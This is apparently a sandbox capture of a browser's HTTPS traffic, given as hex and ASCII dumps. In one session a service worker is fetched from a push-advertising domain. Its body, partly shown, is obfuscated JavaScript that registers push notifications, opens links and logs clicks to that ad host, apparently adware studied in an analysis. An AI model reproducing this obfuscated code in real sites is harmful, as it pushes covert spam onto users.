                                                          Data Ascii: 6;Hw5X-`urZ<o~T.XR4"kzpG?B@(^a061w\Y!PDLIHJj{Xy&zU=}n}@jgsEs/&s{qy.{bEGG2?+swZ7!Gyh"NOy6s
                                                          2023-11-27 03:23:53 UTC1369INData Raw: b6 db 2b d0 ea 70 47 9f 25 97 fd ee c2 2e 1b ed dd ae 60 d5 e1 01 2b 43 67 c9 6b b0 0f 88 b5 c1 e1 39 51 8e d4 93 35 46 a0 0f 09 18 9e f2 d2 f0 de 71 9c 2c 46 5e 4b 78 51 ce a5 85 df a3 86 a9 3e d3 70 19 d6 73 e7 5d 5a 7a c1 36 12 76 67 ec 0c bb 95 3f c4 6d e5 27 08 93 ed 4c 75 f0 24 db 3e 31 c9 d6 00 b9 72 d6 78 18 14 65 55 f5 de db 4b 57 5c 27 7d 3f ca 3b 32 2c 0e 00 10 e1 c4 86 40 6b af 0a b4 3a d2 41 19 78 92 29 03 4f ed bc fe 6f da 1d ac 3a 34 60 85 63 1f 61 89 a2 4a a1 90 12 47 ee 11 dd 3f 61 9f e8 ed bb ff d2 d0 02 fa e4 85 97 a2 47 f7 3f 52 32 1a 16 a3 80 16 9c 28 b2 2c 03 88 d7 3a cb 2e a5 48 00 62 52 1a f1 7b 87 fd 2a 7a e1 a2 2b 0b 5f 1f aa 03 0d 79 88 a5 cc 22 42 95 c8 92 52 49 07 8d 78 64 9a c9 66 00 0a 59 8c 9c 0f 59 56 3b f7 b2 c2 79 40 ff
                                                          Data Ascii: +pG%.`+Cgk9Q5Fq,F^KxQ>ps]Zz6vg?m'Lu$>1rxeUKW\'}?;2,@k:Ax)Oo:4`caJG?aG?R2(,:.HbR{*z+_y"BRIxdfYYV;y@
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 99 d6 73 e7 5f 5a d3 7f e4 fd d8 07 4d 1f 7b dd d6 b3 0a af 0b 8d 3c f5 7c 3a 4c 19 f8 2f 93 61 8d 6d 36 56 49 34 fb 62 64 02 56 c0 bd 92 2d f6 2d 6d ff 8a 27 6e bd 50 59 63 32 19 64 8a d9 79 62 0b 5d 81 a2 de 8d 4f b9 49 e9 26 60 21 25 c6 b6 c9 9d a7 1c bd ad 1a 21 3b c7 c6 97 b1 16 68 18 a6 d4 94 c5 67 ce ad 9e eb 31 c0 9a 38 07 34 b3 36 19 10 33 f0 bb 85 0b b1 77 c2 d8 22 17 a0 52 0a a1 89 63 bd 58 31 54 45 0e a5 87 65 ce 19 32 6b 5e 90 bd b6 14 ac 5e b9 ee 66 e9 e9 89 d4 8e 01 27 cd b0 34 cb a2 3c a4 af 45 43 5e 32 ad 69 47 e7 8a 00 c2 8b 0b 39 59 3c 28 64 62 c1 80 96 1c ee 41 22 fd c8 ee 5b 38 20 4b ca 53 57 a0 55 7b 9c f5 63 29 03 ff 75 71 97 8d ff a7 d9 38 e5 a3 d9 17 25 04 aa 70 c8 39 01 58 92 61 21 6b 5c 4c d8 a4 04 b4 2a 9f 53 ed f0 2d 83 b7 6e
                                                          Data Ascii: s_ZM{<|:L/am6VI4bdV--m'nPYc2dyb]OI&`!%!;hg18463w"RcX1TEe2k^^f'4<EC^2iG9Y<(dbA"[8 KSWU{c)uq8%p9Xa!k\L*S-n
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 81 95 73 5d 71 a5 9e cf 9e 78 2a 92 c2 bb d2 6d 86 96 3c 5a 06 b9 7f f3 c4 d4 27 bf 58 6e ed bc bb 6c fd eb 02 7e f6 bc 4b 12 4f 4d 9f ea 3b c2 67 e8 48 2c 24 4e b3 f8 d1 ce ca 0b 74 9c 84 93 a5 e4 cd de b1 d4 8b ee 16 86 bd 2b 2d 5d 29 ff 5a a2 97 45 b9 48 d6 67 65 6f c6 c6 60 35 c4 82 15 40 96 06 40 b2 4a b1 22 33 00 24 e5 63 aa df 65 b3 8d 11 5e 33 0c 50 e2 3a bd fb c0 a3 32 1f 88 5e 18 07 63 4e 7e 0e 92 46 38 a3 32 00 99 f9 28 9b 15 06 dc 39 b7 f4 e2 2f 13 4a 7d b0 d9 d5 be 16 1c 01 2b 51 2c dd cf 95 e7 b7 e4 fe fc 2b d7 de e8 45 fb b4 8c f3 8d 73 32 71 97 91 c7 1b 1d 71 39 9e 77 be d0 29 68 e2 93 ad cb 1c a2 4c 36 2c ba a0 75 86 29 03 0f 59 75 ad 6f 2f eb d2 63 e7 66 e3 51 dd 68 6f c0 4a cb 1a 2b 3f 29 39 de 32 4a 16 9c 9d bf 1b 67 8f 1d ec 36 b7 70
                                                          Data Ascii: s]qx*m<Z'Xnl~KOM;gH,$Nt+-])ZEHgeo`5@@J"3$ce^3P:2^cN~F82(9/J}+Q,+Es2qq9w)hL6,u)Yuo/cfQhoJ+?)92Jg6p
                                                          2023-11-27 03:23:53 UTC1369INData Raw: ce cd 80 58 c8 ba 16 b2 a3 c9 98 64 17 6c b4 a5 08 58 00 1b ef 4d 45 95 00 49 7f 09 a0 0a b3 2a 01 5a 04 03 bb 87 da 5b 03 7d 89 a3 2a ab 1f 16 b0 ce 35 d2 e0 d2 56 c1 eb a6 47 71 1a 01 ad b2 01 c0 90 19 ca 83 42 c7 a3 7a 66 68 82 65 f4 49 a5 a7 e8 89 c6 e3 04 f4 20 99 96 03 ad 9b ec 03 6a 94 db 3d 14 d0 72 3b ce cd 74 e3 6e a3 83 32 f0 80 95 bb fe af f9 7c c1 04 2b a2 cd 2f 4c 96 da 82 1b a6 25 f3 78 fe 82 cb db ec c6 e6 06 13 6e cf 2e 7b 79 76 7b 96 e5 7b d8 9c cd 6a bc e7 ed 7c 41 96 64 7e cd f2 87 ec 06 00 80 44 13 9b 05 55 43 5e 7d 62 76 b2 64 dd d1 29 10 a4 8d 5c 21 3c ea 88 88 92 3d bd 84 8d 65 fa 87 9b 14 d2 cc 27 63 30 40 c8 b9 94 21 a2 86 a0 d5 96 41 79 9e 06 2d 7a 5a 65 00 a1 6c 40 f0 4c 88 29 06 d2 c7 89 2c 27 9c 3d 4d b4 1f b6 f1 f4 06 1e 16
                                                          Data Ascii: XdlXMEI*Z[}*5VGqBzfheI j=r;tn2|+/L%xn.{yv{{j|Ad~DUC^}bvd)\!<=e'c0@!Ay-zZel@L),'=M
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 4b 2e 3b a8 d9 d8 d2 2e d1 52 50 ca 3b ae 4e 03 16 0d 6e f3 54 12 85 84 dd f7 2b 2c 33 b4 11 cc 4e 1c 4f 66 38 56 6c 2f db 59 c3 49 52 6a d0 07 2b 53 aa 68 79 68 7b 5a e3 1d 41 73 b8 17 79 13 fb 2d f8 4d 66 b1 02 8e ad d5 7b 92 1b fb 03 3b c4 2c e4 c3 c1 a3 e3 72 b0 5e d3 38 23 ab 4a 68 86 05 16 63 a1 46 98 2c 3e 37 bb a8 ba 55 65 41 8b ef 23 73 55 de 91 70 c3 a0 5e 30 5e 84 8c 4f e0 a5 48 56 54 6f 51 bf 74 c5 9f ec 3c a3 50 4c 6c c6 c4 6b 51 be de e2 c8 b6 fe 60 38 3b 41 ef 18 14 2b 80 06 86 1f 99 d9 68 8d b6 5a cf 24 40 85 fa fa 6a 12 22 ea 20 c1 d0 3d 52 45 0a 5a 26 23 a4 ec ab 97 49 32 64 ce bd 94 34 6d cd 29 0d 9b 08 5c 94 81 26 bb fa cf 66 e3 4a bb 45 a3 20 95 2d 69 9c 3c c2 be 4b ba c1 fd c9 dc 7c 5a 83 36 83 c9 16 c4 9c c0 64 47 a2 e0 00 59 f3 97
                                                          Data Ascii: K.;.RP;NnT+,3NOf8Vl/YIRj+Shyh{ZAsy-Mf{;,r^8#JhcF,>7UeA#sUp^0^OHVToQt<PLlkQ`8;A+hZ$@j" =REZ&#I2d4m)\&fJE -i<K|Z6dGY
                                                          2023-11-27 03:23:53 UTC1369INData Raw: f4 0d 65 b4 01 65 69 2f 38 93 90 19 c1 e8 95 94 c0 3d 07 a4 68 19 6d 0f 5a a6 04 e4 f8 c7 26 4b 2c fd ff 37 1b 43 e6 6b 64 2e a0 b5 d3 3c 16 57 da 39 55 4d c9 72 86 ea 13 6d bc 55 26 70 ea 04 f1 76 f5 28 2f c7 92 06 19 7a 50 cf 9d 77 69 dd 45 f4 ea f5 33 24 2b f2 46 04 db 39 f9 5f 7d 2a ea eb 35 50 1e b2 f8 45 cf db b9 b1 a8 cb 30 bf 83 1b 3b 6f 46 30 0c df b3 6a 0d 58 a5 b2 2b 75 5d d6 11 1c ce 0b 70 fd e8 d9 17 72 cf e3 eb 4f 3f 17 97 1d ae 11 8b 55 32 2f e7 e7 a7 06 a4 62 f2 50 12 b4 28 0f 71 f9 11 df 40 f3 73 00 a2 50 4a 26 4d 93 92 ba 8c 78 df db 77 dd 2f 0f 04 51 59 50 b7 a1 0d 82 a1 e5 46 16 66 02 d0 33 c6 94 cc 03 47 06 d8 cd f9 be 6b 40 bc 28 30 a7 45 cb 5d a8 17 81 1b 8f 07 2e 95 a4 46 ae 3b d0 34 43 69 f5 ef ef 59 45 8e 6f be fa 2a 7a e2 c8 df
                                                          Data Ascii: eei/8=hmZ&K,7Ckd.<W9UMrmU&pv(/zPwiE3$+F9_}*5PE0;oF0jX+u]prO?U2/bP(q@sPJ&Mxw/QYPFf3Gk@(0E].F;4CiYEo*z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.549760172.64.100.64434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:54 UTC464OUTGET /javascripts/service_worker.js?v1 HTTP/1.1
                                                          Host: pushlite.neptuneadspush.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:23:54 UTC714INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 37 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 36 20 53 65 70 20 32 30 32 33 20 31 30 3a 33 39 3a 31 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 31 32 62 34 64 32 2d 32 36 30 61 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 32 36 37 38 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:54 GMTContent-Type: application/javascriptContent-Length: 9738Connection: closeLast-Modified: Tue, 26 Sep 2023 10:39:14 GMTETag: "6512b4d2-260a"Cache-Control: max-age=2678400CF-Cache-Status: HIT
                                                          2023-11-27 03:23:54 UTC655INData Raw: 76 61 72 20 5f 24 5f 35 35 37 35 3d 5b 22 5c 78 36 39 5c 78 36 45 5c 78 37 33 5c 78 37 34 5c 78 36 31 5c 78 36 43 5c 78 36 43 22 2c 22 5c 78 35 42 5c 78 35 30 5c 78 35 35 5c 78 35 33 5c 78 34 38 5c 78 34 45 5c 78 34 46 5c 78 35 34 5c 78 34 39 5c 78 34 36 5c 78 34 39 5c 78 34 33 5c 78 34 31 5c 78 35 34 5c 78 34 39 5c 78 34 46 5c 78 34 45 5c 78 35 33 5c 78 35 44 5c 78 32 30 5c 78 34 39 5c 78 36 45 5c 78 37 33 5c 78 37 34 5c 78 36 31 5c 78 36 43 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 32 30 5c 78 37 33 5c 78 36 35 5c 78 37 32 5c 78 37 36 5c 78 36 39 5c 78 36 33 5c 78 36 35 5c 78 32 30 5c 78 37 37 5c 78 36 46 5c 78 37 32 5c 78 36 42 5c 78 36 35 5c 78 37 32 22 2c 22 5c 78 36 43 5c 78 36 46 5c 78 36 37 22 2c 22 5c 78 37 33 5c 78 36 42 5c 78 36 39
                                                          Data Ascii: var _$_5575=["\x69\x6E\x73\x74\x61\x6C\x6C","\x5B\x50\x55\x53\x48\x4E\x4F\x54\x49\x46\x49\x43\x41\x54\x49\x4F\x4E\x53\x5D\x20\x49\x6E\x73\x74\x61\x6C\x6C\x69\x6E\x67\x20\x73\x65\x72\x76\x69\x63\x65\x20\x77\x6F\x72\x6B\x65\x72","\x6C\x6F\x67","\x73\x6B\x69
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 36 45 5c 78 37 34 5c 78 37 33 22 2c 22 5c 78 36 44 5c 78 36 35 5c 78 37 33 5c 78 37 33 5c 78 36 31 5c 78 36 37 5c 78 36 35 22 2c 22 5c 78 35 42 5c 78 35 30 5c 78 35 35 5c 78 35 33 5c 78 34 38 5c 78 34 45 5c 78 34 46 5c 78 35 34 5c 78 34 39 5c 78 34 36 5c 78 34 39 5c 78 34 33 5c 78 34 31 5c 78 35 34 5c 78 34 39 5c 78 34 46 5c 78 34 45 5c 78 35 33 5c 78 35 44 5c 78 32 30 5c 78 34 38 5c 78 36 31 5c 78 36 45 5c 78 36 34 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 32 30 5c 78 36 44 5c 78 36 35 5c 78 37 33 5c 78 37 33 5c 78 36 31 5c 78 36 37 5c 78 36 35 5c 78 32 30 5c 78 36 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 33 41 22 2c 22 5c 78 37 30 5c 78 37 35 5c 78 37 33 5c 78 36 38 22 2c 22 5c 78 35 42 5c 78 35 30 5c 78 35 35 5c 78 35 33 5c
                                                          Data Ascii: 6E\x74\x73","\x6D\x65\x73\x73\x61\x67\x65","\x5B\x50\x55\x53\x48\x4E\x4F\x54\x49\x46\x49\x43\x41\x54\x49\x4F\x4E\x53\x5D\x20\x48\x61\x6E\x64\x6C\x69\x6E\x67\x20\x6D\x65\x73\x73\x61\x67\x65\x20\x65\x76\x65\x6E\x74\x3A","\x70\x75\x73\x68","\x5B\x50\x55\x53\
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 78 34 44 5c 78 36 35 5c 78 37 33 5c 78 37 33 5c 78 36 31 5c 78 36 37 5c 78 36 35 5c 78 32 30 5c 78 36 45 5c 78 36 46 5c 78 37 34 5c 78 32 30 5c 78 36 36 5c 78 36 46 5c 78 37 35 5c 78 36 45 5c 78 36 34 22 2c 22 5c 78 35 42 5c 78 35 30 5c 78 35 35 5c 78 35 33 5c 78 34 38 5c 78 34 45 5c 78 34 46 5c 78 35 34 5c 78 34 39 5c 78 34 36 5c 78 34 39 5c 78 34 33 5c 78 34 31 5c 78 35 34 5c 78 34 39 5c 78 34 46 5c 78 34 45 5c 78 35 33 5c 78 35 44 5c 78 32 30 5c 78 34 33 5c 78 36 38 5c 78 36 35 5c 78 36 33 5c 78 36 42 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 32 30 5c 78 37 30 5c 78 36 31 5c 78 37 39 5c 78 36 43 5c 78 36 46 5c 78 36 31 5c 78 36 34 5c 78 32 30 5c 78 36 34 5c 78 36 31 5c 78 37 34 5c 78 36 31 22 2c 22 5c 78 36 43 5c 78 36 46 5c 78 36 37 5c 78 36 39 5c 78
                                                          Data Ascii: x4D\x65\x73\x73\x61\x67\x65\x20\x6E\x6F\x74\x20\x66\x6F\x75\x6E\x64","\x5B\x50\x55\x53\x48\x4E\x4F\x54\x49\x46\x49\x43\x41\x54\x49\x4F\x4E\x53\x5D\x20\x43\x68\x65\x63\x6B\x69\x6E\x67\x20\x70\x61\x79\x6C\x6F\x61\x64\x20\x64\x61\x74\x61","\x6C\x6F\x67\x69\x
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 45 5c 78 36 45 5c 78 36 35 5c 78 37 30 5c 78 37 34 5c 78 37 35 5c 78 36 45 5c 78 36 35 5c 78 36 31 5c 78 36 34 5c 78 37 33 5c 78 37 30 5c 78 37 35 5c 78 37 33 5c 78 36 38 5c 78 32 45 5c 78 36 33 5c 78 36 46 5c 78 36 44 5c 78 32 46 5c 78 36 31 5c 78 37 30 5c 78 36 39 5c 78 32 46 5c 78 36 43 5c 78 36 46 5c 78 36 37 5c 78 32 46 5c 78 36 33 5c 78 36 43 5c 78 36 39 5c 78 36 33 5c 78 36 42 5c 78 32 46 22 2c 22 5c 78 37 30 5c 78 36 46 5c 78 37 33 5c 78 37 34 22 2c 22 5c 78 36 31 5c 78 37 30 5c 78 37 30 5c 78 36 43 5c 78 36 39 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 46 5c 78 36 41 5c 78 37 33 5c 78 36 46 5c 78 36 45 22 2c 22 5c 78 36 31 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 37 33 22 2c 22 5c 78
                                                          Data Ascii: E\x6E\x65\x70\x74\x75\x6E\x65\x61\x64\x73\x70\x75\x73\x68\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x6C\x6F\x67\x2F\x63\x6C\x69\x63\x6B\x2F","\x70\x6F\x73\x74","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x61\x63\x74\x69\x6F\x6E\x73","\x
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 3b 73 65 6c 66 5b 5f 24 5f 35 35 37 35 5b 35 5d 5d 28 5f 24 5f 35 35 37 35 5b 31 30 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 43 31 34 30 29 7b 63 6f 6e 73 6f 6c 65 5b 5f 24 5f 35 35 37 35 5b 32 5d 5d 28 5f 24 5f 35 35 37 35 5b 31 31 5d 2c 5f 30 78 43 31 34 30 29 3b 63 6f 6e 73 6f 6c 65 5b 5f 24 5f 35 35 37 35 5b 32 5d 5d 28 5f 30 78 43 31 34 30 29 7d 29 3b 73 65 6c 66 5b 5f 24 5f 35 35 37 35 5b 35 5d 5d 28 5f 24 5f 35 35 37 35 5b 31 32 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 43 31 34 30 29 7b 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 34 5d 5d 28 73 65 6c 66 5b 5f 24 5f 35 35 37 35 5b 34 31 5d 5d 5b 5f 24 5f 35 35 37 35 5b 34 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 34 34 5d 5d 28 29 5b 5f 24 5f 35 35 37 35 5b 34 32 5d 5d 28 66 75 6e 63 74 69 6f 6e 28
                                                          Data Ascii: ;self[_$_5575[5]](_$_5575[10],function(_0xC140){console[_$_5575[2]](_$_5575[11],_0xC140);console[_$_5575[2]](_0xC140)});self[_$_5575[5]](_$_5575[12],function(_0xC140){_0xC140[_$_5575[4]](self[_$_5575[41]][_$_5575[45]][_$_5575[44]]()[_$_5575[42]](function(
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 3b 69 66 28 5f 30 78 43 31 37 43 21 3d 20 6e 75 6c 6c 29 7b 5f 30 78 43 31 35 34 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 33 33 5d 5d 3d 20 5f 30 78 43 31 37 43 7d 3b 63 6f 6e 73 6f 6c 65 5b 5f 24 5f 35 35 37 35 5b 32 5d 5d 28 4a 53 4f 4e 5b 5f 24 5f 35 35 37 35 5b 33 34 5d 5d 28 5f 30 78 43 31 35 34 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 29 29 3b 69 66 28 5f 30 78 43 31 35 34 26 26 20 5f 30 78 43 31 35 34 5b 5f 24 5f 35 35 37 35 5b 33 35 5d 5d 26 26 20 5f 30 78 43 31 35 34 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 29 7b 74 72 79 7b 69 66 28 5f 30 78 43 31 35 34 5b 5f 24 5f 35 35 37 35 5b 33 36 5d 5d 29 7b 69 66 28 21 41 72 72 61 79 5b 5f 24 5f 35 35 37 35 5b 33 37 5d 5d 28 5f 30 78 43 31 35 34
                                                          Data Ascii: ;if(_0xC17C!= null){_0xC154[_$_5575[15]][_$_5575[15]][_$_5575[33]]= _0xC17C};console[_$_5575[2]](JSON[_$_5575[34]](_0xC154[_$_5575[15]]));if(_0xC154&& _0xC154[_$_5575[35]]&& _0xC154[_$_5575[15]]){try{if(_0xC154[_$_5575[36]]){if(!Array[_$_5575[37]](_0xC154
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 31 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 33 39 5d 5d 29 7b 69 66 28 21 41 72 72 61 79 5b 5f 24 5f 35 35 37 35 5b 33 37 5d 5d 28 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 34 38 5d 5d 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 33 39 5d 5d 29 29 7b 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 34 38 5d 5d 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 33 39 5d 5d 3d 20 5b 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 34 38 5d 5d 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 33 39 5d 5d 5d 7d 3b 66 6f 72 28 76 61 72 20 5f 30 78 43 31 43 43 3d 30 3b 5f 30 78 43 31 43 43 3c 20 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 34 38 5d 5d 5b 5f 24 5f 35 35 37 35 5b 31 35 5d 5d 5b 5f 24 5f 35 35
                                                          Data Ascii: 15]][_$_5575[39]]){if(!Array[_$_5575[37]](_0xC140[_$_5575[48]][_$_5575[15]][_$_5575[39]])){_0xC140[_$_5575[48]][_$_5575[15]][_$_5575[39]]= [_0xC140[_$_5575[48]][_$_5575[15]][_$_5575[39]]]};for(var _0xC1CC=0;_0xC1CC< _0xC140[_$_5575[48]][_$_5575[15]][_$_55
                                                          2023-11-27 03:23:54 UTC869INData Raw: 74 75 72 6e 20 63 6c 69 65 6e 74 73 5b 5f 24 5f 35 35 37 35 5b 36 33 5d 5d 28 61 74 6c 69 6e 6b 29 7d 29 3b 73 65 6c 66 5b 5f 24 5f 35 35 37 35 5b 35 5d 5d 28 5f 24 5f 35 35 37 35 5b 36 36 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 43 31 34 30 29 7b 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 34 5d 5d 28 73 65 6c 66 5b 5f 24 5f 35 35 37 35 5b 34 31 5d 5d 5b 5f 24 5f 35 35 37 35 5b 34 35 5d 5d 5b 5f 24 5f 35 35 37 35 5b 34 34 5d 5d 28 29 5b 5f 24 5f 35 35 37 35 5b 34 32 5d 5d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 43 31 41 34 29 7b 69 66 28 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 36 38 5d 5d 26 26 20 5f 30 78 43 31 34 30 5b 5f 24 5f 35 35 37 35 5b 36 39 5d 5d 26 26 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 5b 5f 24 5f 35 35 37 35 5b 37 30 5d 5d 3d
                                                          Data Ascii: turn clients[_$_5575[63]](atlink)});self[_$_5575[5]](_$_5575[66],function(_0xC140){_0xC140[_$_5575[4]](self[_$_5575[41]][_$_5575[45]][_$_5575[44]]()[_$_5575[42]](function(_0xC1A4){if(_0xC140[_$_5575[68]]&& _0xC140[_$_5575[69]]&& Notification[_$_5575[70]]=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.549761172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:54 UTC545OUTGET /yufapeso/yeje/sudulexu/rocalibu/zo/images/a-favicon.ico HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:55 UTC698INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 33 38 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 31 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 37 36 65 2d 36 30 38 39 30 32 66 30 38 65 65 30 38 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:55 GMTContent-Type: image/vnd.microsoft.iconContent-Length: 22382Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:17 GMTETag: "576e-608902f08ee08"Cache-Control: max-age=14400CF-Cache-Status
                                                          2023-11-27 03:23:55 UTC671INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 9e 04 00 00 40 40 00 00 01 00 20 00 28 42 00 00 46 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 58 88 88 88 a5 88 88 88 4a 88
                                                          Data Ascii: h6 @@ (BF( XJ
                                                          2023-11-27 03:23:55 UTC1369INData Raw: ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 c0 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 5d 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 55 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 f8 88 88 88 34 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 76 88 88 88 ec 88 88 88 f2 88 88 88 88 88 88 88 32 88 88 88 74 88 88 88 ee 88 88 88 f6 88 88 88 a2 88 88 88 13 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 0f 88 88 88 14 88 88 88 00 88 88 88 48 88 88 88 39 88 88 88 0e 88 88 88 19 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00
                                                          Data Ascii: ]U4v2tH9
